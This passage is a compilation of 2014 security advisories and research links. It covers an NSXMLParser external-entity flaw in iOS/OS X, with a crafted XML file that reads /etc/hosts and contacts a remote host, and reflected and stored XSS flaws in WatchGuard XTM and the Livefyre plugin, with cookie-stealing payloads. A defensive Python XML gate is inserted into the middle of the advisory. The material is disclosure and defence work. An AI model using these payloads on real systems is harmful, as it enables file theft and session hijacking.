jailbroken devices, any file on the filesystem.


Vulnerability Details
~-------------------~

Apple's NSXMLParser documentation [2] indicates that external entity
resolution is disabled in the parser by default. However, inspection of
multiple applications running on iOS 7.0 and 7.1 shows that they resolve
external entities by default, and continue to do so even when entity
resolution is disabled explicitly, as shown below:

    [nsXmlParser setShouldResolveExternalEntities:NO];

The following source code demonstrates the flaw:


- (void) doParse:(NSData *)data {

    // create and init NSXMLParser object
    NSXMLParser *nsXmlParser = [[NSXMLParser alloc] initWithData:data];

    // Why does the following not even work!?
    [nsXmlParser setShouldResolveExternalEntities:NO];

    // create and init our delegate
    VSRParser *parser = [[VSRParser alloc] initXMLParser];

    // set delegate
    [nsXmlParser setDelegate:parser];

    // parsing...
    BOOL success = [nsXmlParser parse];

    // test the result
    if (success) {
        NSLog(@"No errors");
        NSMutableArray *stuff = [parser tests];

    } else {
        NSLog(@"Error parsing document!");
    }

    [parser release];
    [nsXmlParser release];

}


When parsing a crafted input XML file such as the one shown below, the XML
parser attempts to perform network name resolution and to access the resource
defined by &http;:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY http SYSTEM "http://iossdk-xxe.apt.vsecurity.org/">
<!ENTITY file SYSTEM "file:///etc/hosts">
]>
<test>
    <vsr>
        <tag1>&file;</tag1>
        <tag2>&http;</tag2>
    </vsr>
</test>

The following DNS and web server log entries show the parser's attempts to
resolve &http;:

2014-05-19_13:26:28.31088 ...  iossdk-xxe.apt.vsecurity.org

XX.XX.XX.XX - - [19/May/2014:09:26:28 -0400] "GET /xxe HTTP/1.0" 404 446
"-" "-"


In more serious exploitation scenarios, plaintext XML communications between
a server and an iOS mobile application, or an OS X client application, could be
intercepted and modified in transit to reference a file present on the client
device. If the device reflects this value in subsequent communications or
errors, the contents of files stored on the device could be leaked to an
attacker.
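Because the finding above is that the parser-level switch cannot be trusted, a defender can refuse untrusted XML that declares any external resource before it ever reaches NSXMLParser. The following pre-parse gate is an added example, not VSR's or Apple's code: it locates the DOCTYPE, strips comments, and reports an external DTD reference and every SYSTEM/PUBLIC entity or parameter-entity declaration; the sample inputs (built from the advisory's crafted document) and all function names are constructed here.

```python
import re

# Constructed sample input, built from the crafted document in the advisory:
# two external entities, one pointing at a remote host and one at a local file.
CRAFTED_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY http SYSTEM "http://iossdk-xxe.apt.vsecurity.org/">
<!ENTITY file SYSTEM "file:///etc/hosts">
]>
<test><vsr><tag1>&file;</tag1><tag2>&http;</tag2></vsr></test>"""
# Constructed benign input: same vocabulary, no DOCTYPE at all.
BENIGN_XML = b'<?xml version="1.0"?><test><vsr><tag1>ok</tag1></vsr></test>'

_COMMENT = re.compile(rb"<!--.*?-->", re.S)
# SYSTEM takes one literal (the URI); PUBLIC takes a public id and then the URI.
_EXT_ID = rb'(?P<kw>SYSTEM|PUBLIC)\s+["\'](?P<lit1>[^"\']*)["\'](?:\s+["\'](?P<lit2>[^"\']*)["\'])?'
_DOCTYPE = re.compile(rb"<!DOCTYPE\s+[^\s\[>]+\s+" + _EXT_ID, re.I)
_ENTITY = re.compile(rb"<!ENTITY\s+(%\s*)?[^\s>]+\s+" + _EXT_ID, re.I)

def _doctype_region(xml: bytes) -> bytes:
    """Return the DOCTYPE declaration, including any internal subset, or b''."""
    m = re.search(rb"<!DOCTYPE\b", xml, re.I)
    if not m:
        return b""
    start, subset, close = m.start(), xml.find(b"[", m.end()), xml.find(b">", m.end())
    if subset != -1 and (close == -1 or subset < close):
        close = xml.find(b"]>", subset)  # an internal subset is closed by ']>'
        return xml[start:] if close == -1 else xml[start:close + 2]
    return xml[start:] if close == -1 else xml[start:close + 1]

def _uri(m: re.Match) -> str:
    """The system literal is the second literal for PUBLIC, the only one for SYSTEM."""
    lit = m.group("lit2") if m.group("kw").upper() == b"PUBLIC" and m.group("lit2") else m.group("lit1")
    return lit.decode("utf-8", "replace")

def external_references(xml: bytes) -> list[tuple[str, str]]:
    """List (kind, uri) for every resource an entity-resolving parser would fetch."""
    dtd = _COMMENT.sub(b"", _doctype_region(xml))
    refs = []
    m = _DOCTYPE.match(dtd)
    if m:
        refs.append(("external-dtd", _uri(m)))
    for m in _ENTITY.finditer(dtd):
        refs.append(("parameter-entity" if m.group(1) else "entity", _uri(m)))
    return refs

def is_safe_for_nsxmlparser(xml: bytes) -> bool:
    """Fail-closed gate for untrusted XML when setShouldResolveExternalEntities:NO is ignored."""
    return not external_references(xml)
```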

Versions Affected
~---------------~
VSR's analysis revealed that the iOS 7.0 and 7.1 SDKs are vulnerable, while
earlier versions of iOS and the iOS SDK do not appear to be affected. This
vulnerability also affects the OS X Foundation framework; however, VSR has not
verified the earliest version of the Foundation framework for OS X which is
affected.


Vendor Response
~-------------~
The following timeline details Apple's response to the reported issue:

2014-05-19    Apple was provided a draft advisory.
2014-07-10    Apple confirms issues to be fixed in iOS 8 and OSX Yosemite
2014-09-17    Apple releases iOS 8 and OS X 10.9.5, which are presumed to
              fix this vulnerability.


Recommendation
~------------~
This vulnerability requires an updated version of iOS and OS X from
Apple, as even the built-in methods for disabling XXE appear to be
non-functional. Users should update their devices to iOS 8 and OS X
Mavericks 10.9.5 with the Software Update [3] mechanism.


Common Vulnerabilities and Exposures (CVE) Information
~----------------------------------------------------~
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2014-4374 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

References:

1.
https://developer.apple.com/library/ios/documentation/DeveloperTools/Conceptual/cross_development/Introduction/Introduction.html#//apple_ref/doc/uid/10000163-BCICHGIE

2.
https://developer.apple.com/library/ios/documentation/Cocoa/Reference/Foundation/Classes/NSXMLParser_Class/Reference/Reference.html

3. http://support.apple.com/kb/HT1222


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety.  This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose.  Neither Virtual Security Research, LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible
disclosure practices:
  http://www.vsecurity.com/company/disclosure

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     Copyright 2014 Virtual Security Research, LLC.  All rights reserved.

Reflected XSS Attacks vulnerabilities in WatchGuard XTM 11.8.3 (CVE-2014-6413)

I. VULNERABILITY

Reflected XSS Attacks vulnerabilities in WatchGuard XTM 11.8.3

II. BACKGROUND
-------------------------
WatchGuard builds affordable, all-in-one network and content security
solutions to provide defense in depth for corporate content, networks
and the businesses they power.

III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in WatchGuard XTM.
The code injection is done through the parameter "poll_name" in the
page "/firewall/policy?pol_name=(HERE XSS)".

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter "poll_name" correctly.
https://10.200.210.100:8080/network/dynamic_dns_config?intf=aaaa<script>alert(document.cookie)</script>

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in the context of a
targeted user's browser, allowing cookie theft and session hijacking, and
thus enabling full access to the box.

VI. SYSTEMS AFFECTED
-------------------------
Tested WatchGuard XTM Version: 11.8.3 (Build 446065)
VII. SOLUTION
-------------------------
All data received by the application that can be modified by the user
must be validated before any kind of transaction is made with it.

By William Costa
william.costa@gmail.com

Malicious iOS Apps

As part of one of our recent research projects, we evaluated how malicious third-party apps could affect user privacy, despite the various security controls and the solid security architecture of the iOS platform. Therefore, we reviewed the iOS app sandbox model for weaknesses – and, indeed, made some finds.

more here.............http://www.andreas-kurtz.de/2014/09/malicious-apps-ios8.html

FastResponder

This tool collects different artefacts on live Windows systems and records the results in CSV files. By analysing these artefacts, an early compromise can be detected.

more here..............https://github.com/SekoiaLab/FastResponder

Nuclear exploit kit - complete infection cycle

Zscaler ThreatLabZ has been seeing a steady increase in the Nuclear Exploit Kit (EK) traffic over the past few weeks. The detection of malicious activity performed by this EK remains low, due to usage of dynamic content and heavy obfuscation. In this blog, we will walk you through a complete Nuclear EK infection cycle with a live example. We will also share details of the identified payload, which had very low Anti-Virus (AV) detection rates.

more here...........http://research.zscaler.com/2014/09/nuclear-exploit-kit-complete-infection.html

Leveraging LFI To Get Full Compromise On WordPress Sites

In this post I will discuss how a serious but mostly ignored vulnerability can lead to a full compromise of a WordPress site. The key in this attack is how WordPress handles authentication, allowing a brute force attack if the secret salt and key values stored in wp-config.php are exposed. If an innocuous LFI (local file inclusion) or accidental leak of this data by a backup or copy of wp-config.php is successful, then an attacker could generate their own valid auth tokens and gain full access to the site’s admin pages without being detected.

more here...........http://blog.spiderlabs.com/2014/09/leveraging-lfi-to-get-full-compromise-on-wordpress-sites.html

Paper: Protecting Encrypted Cookies from Compression Side-Channel Attacks

Compression is desirable for network applications as it saves bandwidth; however, when data is compressed before being encrypted, the amount of compression leaks information about the amount of redundancy in the plaintext. This side channel has led to successful real-world attacks (the CRIME and BREACH attacks) on web traffic protected by the Transport Layer Security (TLS) protocol. The general guidance in light of these attacks has been to disable compression, preserving confidentiality but sacrificing bandwidth. In this paper, we examine two techniques—heuristic separation of secrets and fixed-dictionary compression—for enabling compression while protecting high-value secrets, such as cookies, from attack. We model the security offered by these techniques and report on the amount of compressibility that they can achieve.

more here.............http://eprint.iacr.org/2014/724.pdf

Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1

Cross-site scripting (XSS) vulnerability in Xcode Server in CoreCollaboration in Apple OS X Server before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Cross-Site Scripting (XSS) exploits occur when attacker controlled data is rendered in an unsafe context that is User Agent Dependent.

more here...........http://www.cloudscan.me/2014/09/cve-2014-4406-apple-sa-2014-09-17-5-os.html

Yahoo SQL Injection to Remote Code Execution to Root Privilege

Today I will blog about a SQL Injection vulnerability that was escalated to Remote Code Execution, then escalated to Root Privilege on one of Yahoo's servers.

The story started while searching in below domain: http://innovationjockeys.yahoo.net/

While intercepting the POST requests, I found the request below, which grabbed my attention with the possibility of SQL Injection.

more here...........http://www.sec-down.com/wordpress/?p=494

FinFisher Malware Dropper Analysis

As you may have heard, a FinFisher malware sample recently leaked online. As I got a little free time today, I decided to take a look at it. The sample I'm going to analyze in this article is finfisher1.exe.bin:

MD5: 074919F13D07CD6CE92BB0738971AFC7

SHA: 9F9A18E81E9B39BD2F047004B8E3B4CB0FB505C9

So, at first glance, I noticed it's written in C++ and compiled using Visual Studio 2005. No packer/crypter/obfuscator has been used. So far, FinFisher's performance is disappointing.


more here............https://www.codeandsec.com/FinFisher-Malware-Dropper-Analysis

INTERNET Permission Bypass via Ping Command for Android 2.X (Sep. 2010)

Although it was already fixed on Android 4.X, I'd like to write an article about this because I think it is very interesting technically.
I reported it to Google in Sep. 2010 and was told my report makes no sense and is a waste of time :-( But it looks to have been patched in Nov. 2010 for 3.X and 4.X. Actually, I don't know whether this is still available for Android 2.X because I can't find any discussion about this on the web. But I think it is still available on some devices.
I found this bypass on my Xperia SO-01B with Android 1.6. This was my first Android :-)
At that time, most users' Androids were 2.X or 1.X and were affected by this.


more here..........http://harupuxa.blogspot.jp/2014/09/internet-permission-bypass-via-ping.html

Livefyre LiveComments Plugin - Stored XSS

Title : Stored XSS in Livefyre LiveComments Plugin
CVE : 2014-6420
Vendor Homepage : http://livefyre.com
Software Link : http://web.livefyre.com/streamhub/#liveComments
Version : v3.0
Author : Brij Kishore Mishra
Date : 03-Sept-2014
Tested On : Chrome 37, Ubuntu 14.04


Description :

This plugin requires the user to be signed in via a Livefyre account to post
comments. Users have the option to upload pictures in comments. This
feature can be easily abused.

Using an intercepting proxy (e.g. Burp Suite), the name variable can be
edited to send an XSS payload while uploading a picture (payload used :
"><img src=x onerror=prompt(1337)>). When the comment is posted, the image
will be successfully uploaded, which leads to XSS due to an unsanitized
field.



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information